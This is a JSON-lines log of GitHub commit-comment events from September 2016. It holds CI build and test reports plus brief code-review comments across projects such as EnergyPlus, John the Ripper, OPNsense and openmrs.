{"id":"4536766939","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18953325,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T21:27:35Z","updated_at":"2016-09-08T21:27:35Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-custom_check.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-08T21:27:35Z"}
{"id":"4536768153","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18953326,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T21:27:48Z","updated_at":"2016-09-08T21:27:48Z","body":"ASIHPValidation (shenb) - x86_64-MacOS-10.9-clang: OK (2324 of 2326 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-08T21:27:48Z"}
{"id":"4536777054","type":"CommitCommentEvent","actor":{"login":"LiNk-NY"},"repo":{"name":"waldronlab/MultiAssayExperiment-TCGA"},"payload":{"comment":{"id":18953340,"position":null,"line":null,"path":null,"commit_id":"84a93b5d7fad30124b683ed354c3570cf1c80f94","created_at":"2016-09-08T21:29:36Z","updated_at":"2016-09-08T21:29:36Z","body":"Looks good @kodalih ! :+1: "}},"created_at":"2016-09-08T21:29:36Z"}
{"id":"4536779962","type":"CommitCommentEvent","actor":{"login":"epifanio"},"repo":{"name":"epifanio/SKA"},"payload":{"comment":{"id":18953353,"position":null,"line":null,"path":null,"commit_id":"13c46985f7f5a7a09ddfddf15968a3f0a557e98a","created_at":"2016-09-08T21:30:13Z","updated_at":"2016-09-08T21:30:13Z","body":"@GeOnoveva  it is too early to say .. but I kind of like it"}},"created_at":"2016-09-08T21:30:13Z"}
{"id":"4536784791","type":"CommitCommentEvent","actor":{"login":"zubco"},"repo":{"name":"BradLarson/GPUImage2"},"payload":{"comment":{"id":18953365,"position":null,"line":null,"path":null,"commit_id":"494b28a87595c1294f74e677c68a8bff056d3a51","created_at":"2016-09-08T21:31:10Z","updated_at":"2016-09-08T21:31:10Z","body":"Nice :)  :+1: "}},"created_at":"2016-09-08T21:31:10Z"}
{"id":"4536786784","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18953369,"position":null,"line":null,"path":null,"commit_id":"ab4ff2811c55eadfda4011b28a3b82d4c3105181","created_at":"2016-09-08T21:31:35Z","updated_at":"2016-09-08T21:31:35Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 23](http://teamcity.otenv.com/viewLog.html?buildId=5184671&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-08T21:31:35Z"}
{"id":"4536787857","type":"CommitCommentEvent","actor":{"login":"jyasskin"},"repo":{"name":"tabatkins/bikeshed"},"payload":{"comment":{"id":18953371,"position":null,"line":null,"path":null,"commit_id":"befeb4baa86128ea51fc2c7c729b01c2c6ad60c4","created_at":"2016-09-08T21:31:48Z","updated_at":"2016-09-08T21:31:48Z","body":":tada:"}},"created_at":"2016-09-08T21:31:48Z"}
{"id":"4536788060","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"emersion/go-js-canvas"},"payload":{"comment":{"id":18953372,"position":null,"line":null,"path":null,"commit_id":"118e42d42ef6f112bbc87c4f3a07d342af6901ab","created_at":"2016-09-08T21:31:51Z","updated_at":"2016-09-08T21:31:51Z","body":"Hey @emersion, did you leave a reply on that issue? If so, I didn't see it, because you've turned off the issue tracker, so I can't view what might've been written there since the link is 404:\r\n\r\nhttps://github.com/emersion/go-js-canvas/issues/1#event-783060469\r\n\r\nOf course, given the content of this README change, I can extrapolate that you decided to deprecate this package in favor of that dom one, since it's not neccessary."}},"created_at":"2016-09-08T21:31:51Z"}
{"id":"4536789125","type":"CommitCommentEvent","actor":{"login":"joshuapinter"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18953376,"position":13,"line":397,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-08T21:32:05Z","updated_at":"2016-09-08T21:32:05Z","body":"Is this necessary? It's been working fine without this."}},"created_at":"2016-09-08T21:32:05Z"}
{"id":"4536792394","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953385,"position":35,"line":157,"path":"src/o3logon_fmt_plug.c","commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:32:41Z","updated_at":"2016-09-08T21:32:41Z","body":"So we now have this\r\n```c\r\n \tif (len < 0) {\r\n #ifdef HAVE_FUZZ\r\n \t\tif (!(options.flags & FLG_FUZZ_CHK || options.flags & FLG_FUZZ_DUMP_CHK))\r\n #endif\r\n \t\t{\r\n \t\tfprintf(stderr, \"%s: Input file is not UTF-8. Please use --input-enc to specify a codepage.\\n\", self->params.label);\r\n \t\terror();\r\n \t\t}\r\n \t}\r\n```\r\n\r\nI think this would make more sense:\r\n```c\r\n \tif (len < 0) {\r\n #ifdef HAVE_FUZZ\r\n\t\tif (!(options.flags & FLG_FUZZ_CHK || options.flags & FLG_FUZZ_DUMP_CHK))\r\n\t\t\treturn 0;\r\n #endif\r\n \t\tfprintf(stderr, \"%s: Input file is not UTF-8. Please use --input-enc to specify a codepage.\\n\", self->params.label);\r\n \t\terror();\r\n \t}\r\n```\r\n"}},"created_at":"2016-09-08T21:32:41Z"}
{"id":"4536792586","type":"CommitCommentEvent","actor":{"login":"CafeLungo"},"repo":{"name":"CafeLungo/ansible-role-nodejs"},"payload":{"comment":{"id":18953386,"position":null,"line":null,"path":null,"commit_id":"5e189a649fbce9f2d5c924db53263dce29946a36","created_at":"2016-09-08T21:32:44Z","updated_at":"2016-09-08T21:32:44Z","body":"Discussion about this issue: https://github.com/geerlingguy/ansible-role-nodejs/issues/43"}},"created_at":"2016-09-08T21:32:44Z"}
{"id":"4536794354","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953399,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:33:05Z","updated_at":"2016-09-08T21:33:05Z","body":"split can make a valid hash invalid (with the enc_upcase)."}},"created_at":"2016-09-08T21:33:05Z"}
{"id":"4536794651","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18953403,"position":null,"line":null,"path":null,"commit_id":"ab4ff2811c55eadfda4011b28a3b82d4c3105181","created_at":"2016-09-08T21:33:13Z","updated_at":"2016-09-08T21:33:13Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 23](http://teamcity.otenv.com/viewLog.html?buildId=5184671&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 19 Build time: 00:01:37"}},"created_at":"2016-09-08T21:33:13Z"}
{"id":"4536796157","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18953405,"position":null,"line":null,"path":null,"commit_id":"af66f0da7c4a80d61cafef7de1a54ddc137ee1e6","created_at":"2016-09-08T21:33:28Z","updated_at":"2016-09-08T21:33:28Z","body":"The modeling needs a bit of polish in this case. Drivers won't be an issue. Yes, we can move crypto and thermal modules to boot time loading, but this also complicates cases where drivers might cause boot crashes or we defer working functionality to boot-time, which makes it harder for people to use these features because they are now supposed to reboot. I think an early kldload works the exact same way other than loader.conf being immune to hiccups in our rc systems or configd hiccups (which are rare but may be elevated by this)."}},"created_at":"2016-09-08T21:33:28Z"}
{"id":"4536796456","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18953406,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-08T21:33:32Z","updated_at":"2016-09-08T21:33:32Z","body":"@dschwartz783 lucky I was able to change it."}},"created_at":"2016-09-08T21:33:32Z"}
{"id":"4536797180","type":"CommitCommentEvent","actor":{"login":"s-ludwig"},"repo":{"name":"mysql-d/mysql-native"},"payload":{"comment":{"id":18953408,"position":null,"line":null,"path":null,"commit_id":"0a3c63217d7482604eeb91a81807f9ff282fcfcb","created_at":"2016-09-08T21:33:40Z","updated_at":"2016-09-08T21:33:40Z","body":"Ouch! Sorry, didn't think of those version blocks that at all!"}},"created_at":"2016-09-08T21:33:40Z"}
{"id":"4536798799","type":"CommitCommentEvent","actor":{"login":"joshuapinter"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18953410,"position":22,"line":416,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-08T21:33:58Z","updated_at":"2016-09-08T21:33:58Z","body":"Same goes for this."}},"created_at":"2016-09-08T21:33:58Z"}
{"id":"4536799539","type":"CommitCommentEvent","actor":{"login":"joshuapinter"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18953414,"position":4,"line":13,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-08T21:34:07Z","updated_at":"2016-09-08T21:34:07Z","body":"Nice, thanks for adding this in here."}},"created_at":"2016-09-08T21:34:07Z"}
{"id":"4536801426","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953422,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:34:30Z","updated_at":"2016-09-08T21:34:30Z","body":"possibly this may be fixable within split, let me see."}},"created_at":"2016-09-08T21:34:30Z"}
{"id":"4536802901","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18953428,"position":null,"line":null,"path":null,"commit_id":"01f5cf09b5b71e9cfc8ffc98e1ad6f3c473d24d6","created_at":"2016-09-08T21:34:50Z","updated_at":"2016-09-08T21:34:50Z","body":"iteration (macumber) - x86_64-MacOS-10.10-clang: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-01f5cf09b5b71e9cfc8ffc98e1ad6f3c473d24d6-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-01f5cf09b5b71e9cfc8ffc98e1ad6f3c473d24d6-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-08T21:34:50Z"}
{"id":"4536803178","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953431,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:34:53Z","updated_at":"2016-09-08T21:34:53Z","body":"I get really bad vibes here. The return of valid will now be the `static char out[128];` in split. The split is called with THAT as ciphertext..."}},"created_at":"2016-09-08T21:34:53Z"}
{"id":"4536806478","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953440,"position":null,"line":null,"path":null,"commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:35:36Z","updated_at":"2016-09-08T21:35:36Z","body":"Forget that, I should get some sleep. Valid returns boolean 😆 "}},"created_at":"2016-09-08T21:35:36Z"}
{"id":"4536807254","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18953444,"position":null,"line":null,"path":null,"commit_id":"2ffeccae84191b47fe7cc376502d6d02fa4e9708","created_at":"2016-09-08T21:35:45Z","updated_at":"2016-09-08T21:35:45Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1186 of 1186 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2ffeccae84191b47fe7cc376502d6d02fa4e9708-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-08T21:35:45Z"}
{"id":"4536811423","type":"CommitCommentEvent","actor":{"login":"Weol"},"repo":{"name":"Weol/WUMA"},"payload":{"comment":{"id":18953455,"position":null,"line":null,"path":null,"commit_id":"9afddaade1c553e5b4d35281cd6e95e13edb274f","created_at":"2016-09-08T21:36:37Z","updated_at":"2016-09-08T21:36:37Z","body":"Also removed ULX independence. "}},"created_at":"2016-09-08T21:36:37Z"}
{"id":"4536813387","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"MarshRom/android_packages_apps_Settings"},"payload":{"comment":{"id":18953458,"position":null,"line":null,"path":null,"commit_id":"a74c283fc00ed9d715b68f2b2bf1c6cf0853614d","created_at":"2016-09-08T21:37:01Z","updated_at":"2016-09-08T21:37:01Z","body":"pls no revert im testing :(\r\nthe dependancy thing "}},"created_at":"2016-09-08T21:37:01Z"}
{"id":"4536814394","type":"CommitCommentEvent","actor":{"login":"Sheddybird"},"repo":{"name":"markalfred/craigslegs.com"},"payload":{"comment":{"id":18953461,"position":null,"line":null,"path":null,"commit_id":"9981e7ca00964a3404c32443eed7a53627639eee","created_at":"2016-09-08T21:37:14Z","updated_at":"2016-09-08T21:37:14Z","body":"Jesus..."}},"created_at":"2016-09-08T21:37:14Z"}
{"id":"4536814591","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18953462,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-08T21:37:15Z","updated_at":"2016-09-08T21:37:15Z","body":"I found it in 10 seconds its *@dktapps*."}},"created_at":"2016-09-08T21:37:15Z"}
{"id":"4536816407","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18953466,"position":null,"line":null,"path":null,"commit_id":"32c29dc16ef570aed6ae68099f6ee8a6a0564414","created_at":"2016-09-08T21:37:37Z","updated_at":"2016-09-08T21:37:37Z","body":"Everyone https://twitter.con/dktapps"}},"created_at":"2016-09-08T21:37:37Z"}
{"id":"4536817848","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":18953469,"position":null,"line":null,"path":null,"commit_id":"83673bc505e75f40793d5dba88c88113f026d555","created_at":"2016-09-08T21:37:56Z","updated_at":"2016-09-08T21:37:56Z","body":"fast-forwarding riak_ts-develop to borshop-integration-1474-bugfix_jrd_time-bound-checks = 6ef22d66"}},"created_at":"2016-09-08T21:37:56Z"}
{"id":"4536818339","type":"CommitCommentEvent","actor":{"login":"Kovee98"},"repo":{"name":"Kovee98/Lab3"},"payload":{"comment":{"id":18953471,"position":null,"line":null,"path":null,"commit_id":"e84dd4b057148a86420d718861bef747ab33c4e3","created_at":"2016-09-08T21:38:02Z","updated_at":"2016-09-08T21:38:02Z","body":"Lol, I need to but it's just modifications to read and writefile.cpp\n\nOn Sep 8, 2016 4:26 PM, \"zen524\" <notifications@github.com> wrote:\n\n> You been pushing your code?\n>\n>\n> -Eric C. Whitaker\n> ________________________________\n> From: Kovee98 <notifications@github.com>\n> Sent: Thursday, September 8, 2016 3:23:25 PM\n> To: Kovee98/Lab3\n> Cc: Eric C Whitaker; Author\n> Subject: Re: [Kovee98/Lab3] I FIXED THE FREAKING PASSWORD.H (e84dd4b)\n>\n>\n> no its all good, man\n>\n> -\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub<https://github.com/\n> Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef7\n> 47ab33c4e3#commitcomment-18953280>, or mute the thread<https://github.com/\n> notifications/unsubscribe-auth/AUWzm129YAkx3A9Uf9oAMcOmUW3q9d\n> 7Wks5qoHzNgaJpZM4J3lly>.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Kovee98/Lab3/commit/e84dd4b057148a86420d718861bef747ab33c4e3#commitcomment-18953317>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AUWwRGnoOMbSXd5Zq0UIPuzQ9A-nvOEvks5qoH2TgaJpZM4J3lly>\n> .\n>\n"}},"created_at":"2016-09-08T21:38:02Z"}
{"id":"4536819161","type":"CommitCommentEvent","actor":{"login":"OldSnake22"},"repo":{"name":"urho3d/Urho3D"},"payload":{"comment":{"id":18953474,"position":null,"line":null,"path":null,"commit_id":"6895a512af350da0e053cd559bf4cbcaefd99329","created_at":"2016-09-08T21:38:13Z","updated_at":"2016-09-08T21:38:13Z","body":"Thank you Cadaver, glad to see you doing some \"enhancement\" tagged issues. "}},"created_at":"2016-09-08T21:38:13Z"}
{"id":"4536824478","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":18953489,"position":371,"line":1569,"path":"api/src/main/java/org/openmrs/api/impl/PatientServiceImpl.java","commit_id":"d65825b685453515f55e30504e9cd92ebaa3f759","created_at":"2016-09-08T21:39:22Z","updated_at":"2016-09-08T21:39:22Z","body":"Good catch @rkorytkowski 👍 \r\nI have made a followup fix at https://github.com/openmrs/openmrs-core/commit/acf7c5b184f6cea456c49334a11c2301ffb2e0b7"}},"created_at":"2016-09-08T21:39:22Z"}
{"id":"4536825237","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18953492,"position":null,"line":null,"path":null,"commit_id":"af66f0da7c4a80d61cafef7de1a54ddc137ee1e6","created_at":"2016-09-08T21:39:31Z","updated_at":"2016-09-08T21:39:31Z","body":"Here's an alternative: add a directory rc.loader.d and reassemble files in there key (file name) and value (contents) pairs. One configd call for rewriting the file. Plugins can still use their data persistently on the file system plus the loader.conf data is rewritten and thus crash safe?\r\n\r\nIf we ever want a GUI on top that would work on the files, doesn't have to be in the config.xml, but maybe the point here is where is your data anchored, in a script that runs during boot or package install? I'd prefer a persistent approach that is deterministic for the subsystem itself. 😊"}},"created_at":"2016-09-08T21:39:31Z"}
{"id":"4536827585","type":"CommitCommentEvent","actor":{"login":"jp-embedded"},"repo":{"name":"axypas/clippy.js"},"payload":{"comment":{"id":18953497,"position":null,"line":null,"path":null,"commit_id":"54227a27b49e364a24af858e3ed8dce162554d3c","created_at":"2016-09-08T21:40:00Z","updated_at":"2016-09-08T21:40:00Z","body":"I think this wont work if path is not set. I get my agent loaded at \"undefinedLinks\""}},"created_at":"2016-09-08T21:40:00Z"}
{"id":"4536837759","type":"CommitCommentEvent","actor":{"login":"alekratz"},"repo":{"name":"tumblr/policy"},"payload":{"comment":{"id":18953537,"position":null,"line":null,"path":null,"commit_id":"10a83db20735bd930f6dc2a6ab4dca4299b800bf","created_at":"2016-09-08T21:42:11Z","updated_at":"2016-09-08T21:42:11Z","body":"@rollership There's a new xkit that totally works! And it's not the responsibility of the tumblr devs to maintain xkit so I declare that specific complaint to be null and void.\r\n\r\nnew xkit: https://github.com/new-xkit/XKit"}},"created_at":"2016-09-08T21:42:11Z"}
{"id":"4536839732","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18953550,"position":79,"line":1451,"path":"src/main/external-resources/UMS.conf","commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-08T21:42:35Z","updated_at":"2016-09-08T21:42:35Z","body":"Test note edition"}},"created_at":"2016-09-08T21:42:35Z"}
{"id":"4536841452","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953560,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:42:58Z","updated_at":"2016-09-08T21:42:58Z","body":"Se realiza el objetivo general del sistema unifsena el cual es:\r\nDiseñar e implementar un sistema web con el fin de facilitar la compra, venta y donación de los uniformes del ceet y poder visualizar la respectiva información de cada uno.\r\n"}},"created_at":"2016-09-08T21:42:58Z"}
{"id":"4536841978","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18953564,"position":79,"line":1451,"path":"src/main/external-resources/UMS.conf","commit_id":"4d35b4442e6218f2937e9feb938ec92a7dec1e3b","created_at":"2016-09-08T21:43:05Z","updated_at":"2016-09-08T21:43:05Z","body":"12354\r\n"}},"created_at":"2016-09-08T21:43:05Z"}
{"id":"4536845320","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":18953577,"position":14,"line":14,"path":"files/lib/system/cache/builder/LanguageCacheBuilder.class.php","commit_id":"1ddca2242624f293e1ef5ad628d90968211133a4","created_at":"2016-09-08T21:43:48Z","updated_at":"2016-09-08T21:43:48Z","body":"Short array syntax."}},"created_at":"2016-09-08T21:43:48Z"}
{"id":"4536848562","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":18953580,"position":null,"line":null,"path":null,"commit_id":"fe47cd2d8ce59a19a5d033f4b77a6ad446190cad","created_at":"2016-09-08T21:44:31Z","updated_at":"2016-09-08T21:44:31Z","body":"anything in mind to fix broken video recording and broken flashlight (outside camera it doesn't work for example with torch function)"}},"created_at":"2016-09-08T21:44:31Z"}
{"id":"4536853526","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/PRIMER-TRIMESTRE"},"payload":{"comment":{"id":18953600,"position":null,"line":null,"path":null,"commit_id":"630239a588e66bb78cb94716785ecfe28fe89839","created_at":"2016-09-08T21:45:31Z","updated_at":"2016-09-08T21:45:31Z","body":"Se realizan los respectivos objetivos específicos del sistem\r\n![captura](https://cloud.githubusercontent.com/assets/21691880/18368070/a6085ed4-75e3-11e6-848b-c45c21f31364.JPG)\r\na unifsena."}},"created_at":"2016-09-08T21:45:31Z"}
{"id":"4536857669","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"Shnoulle/LimeSurvey-Shnoulle"},"payload":{"comment":{"id":18953607,"position":null,"line":null,"path":null,"commit_id":"0d3186860c46497d24aa8c4d7bade2ed66d1f178","created_at":"2016-09-08T21:46:25Z","updated_at":"2016-09-08T21:46:25Z","body":"@tammoterhark explain why tfr is broken yesterday"}},"created_at":"2016-09-08T21:46:25Z"}
{"id":"4536860511","type":"CommitCommentEvent","actor":{"login":"stfx"},"repo":{"name":"BatedUrGonnaDie/Autosplitters"},"payload":{"comment":{"id":18953617,"position":20,"line":18,"path":"Refunct/Refunct.asl","commit_id":"28d2c5d8691fa6c897f9e7aafc824a4050964646","created_at":"2016-09-08T21:47:01Z","updated_at":"2016-09-08T21:47:01Z","body":"Update is out. See #2. I also changed it so level variable (formerly called button count) does not get reallocated after initial load"}},"created_at":"2016-09-08T21:47:01Z"}
{"id":"4536860788","type":"CommitCommentEvent","actor":{"login":"Technetium1"},"repo":{"name":"GoelBiju/pinybot"},"payload":{"comment":{"id":18953620,"position":null,"line":null,"path":null,"commit_id":"3e12291e18e5c1563857e0434509213010ac4281","created_at":"2016-09-08T21:47:05Z","updated_at":"2016-09-08T21:47:05Z","body":"@CSpenz412 Please create an [issue](https://github.com/GoelBiju/pinybot/issues/new) if you have problems."}},"created_at":"2016-09-08T21:47:05Z"}
{"id":"4536862076","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"Qthreads/qthreads"},"payload":{"comment":{"id":18953625,"position":null,"line":null,"path":null,"commit_id":"71c812a2c5215d691273f921ef6a1f2970c19d6d","created_at":"2016-09-08T21:47:20Z","updated_at":"2016-09-08T21:47:20Z","body":"@stelleg just the default, so sherwood I think"}},"created_at":"2016-09-08T21:47:20Z"}
{"id":"4536862273","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953626,"position":15,"line":16,"path":"src/System.Security.Cryptography.Csp/src/System.Security.Cryptography.Csp.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:47:22Z","updated_at":"2016-09-08T21:47:22Z","body":"It looks like I should just delete this check as it was for net46, not 463"}},"created_at":"2016-09-08T21:47:22Z"}
{"id":"4536863272","type":"CommitCommentEvent","actor":{"login":"FelipeRRM"},"repo":{"name":"square/okhttp"},"payload":{"comment":{"id":18953634,"position":null,"line":null,"path":null,"commit_id":"7cefceb1ff51390397524474ca59f9d5e7ef3eca","created_at":"2016-09-08T21:47:35Z","updated_at":"2016-09-08T21:47:35Z","body":"Why is this better than the for-each version?\r\nIn fact I believe it is worse. Please refer to this performance tips by Google: https://developer.android.com/training/articles/perf-tips.html#Loops"}},"created_at":"2016-09-08T21:47:35Z"}
{"id":"4536863792","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18953637,"position":35,"line":157,"path":"src/o3logon_fmt_plug.c","commit_id":"a7d5d793e5d5d8d775ea05bc14e50faf4384a9e5","created_at":"2016-09-08T21:47:41Z","updated_at":"2016-09-08T21:47:41Z","body":"Other than the ! has to be removed, this is a much better solution.  \r\n\r\n```C\r\nif (len < 0) {\r\n #ifdef HAVE_FUZZ\r\n        if (options.flags & FLG_FUZZ_CHK || options.flags & FLG_FUZZ_DUMP_CHK)\r\n            return 0;\r\n #endif\r\n        fprintf(stderr, \"%s: Input file is not UTF-8. Please use --input-enc to specify a codepage.\\n\", self->params.label);\r\n        error();\r\n    }\r\n```"}},"created_at":"2016-09-08T21:47:41Z"}
{"id":"4536864781","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"dotnet/corefx"},"payload":{"comment":{"id":18953638,"position":24,"line":46,"path":"src/System.Security.Cryptography.Csp/src/System.Security.Cryptography.Csp.csproj","commit_id":"7da85ab264d1eea863b49fed9114aec5b82c9179","created_at":"2016-09-08T21:47:52Z","updated_at":"2016-09-08T21:47:52Z","body":"What is this doing?"}},"created_at":"2016-09-08T21:47:52Z"}
{"id":"4536866279","type":"CommitCommentEvent","actor":{"login":"TimWolla"},"repo":{"name":"MysteryCode/de.mysterycode.translate"},"payload":{"comment":{"id":18953640,"position":10,"line":10,"path":"files/lib/data/language/item/value/LanguageItemValueEditor.class.php","commit_id":"92e49cd1cfeb31dc68f4fc48ef469e9294639574","created_at":"2016-09-08T21:48:14Z","updated_at":"2016-09-08T21:48:14Z","body":"`LanguageItemValue::class`"}},"created_at":"2016-09-08T21:48:14Z"}
